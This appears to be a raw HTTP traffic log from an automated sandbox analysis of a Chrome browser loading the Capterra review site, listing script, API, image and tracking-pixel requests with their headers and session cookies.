_ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-af44b767735d6640.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /js/device.js HTTP/1.1Host: device.maxmind.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-00000000000000004d2acae53063d6d1-3d3a0effed00c966-01sec-ch-ua-mobile: ?0x-gdm-source-site: Capterrax-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1Accept: application/json, text/plain, */*x-datadog-trace-id: 5560479775650469585x-datadog-parent-id: 4411855277318523238sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /static/logos/capterra-logo.svg HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/products-search-269c80371465c95a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /fsrelay/s/fs.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://reviews.capterra.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/847-853074d4dea368fa.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_ssgManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /web-vitals/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/v1/categories/targets?lang=en HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /js/device.js HTTP/1.1Host: device.maxmind.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://reviews.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5179d6b3-aa3f-403b-8cb4-718850815472.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e1b492c5-8a97-4b86-a422-d317b2480afa.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/b0bf7e60-e572-4090-8dd8-0e950b0ad16d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /td/rul/1072635088?random=1725034620739&cv=11&fst=1725034620739&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
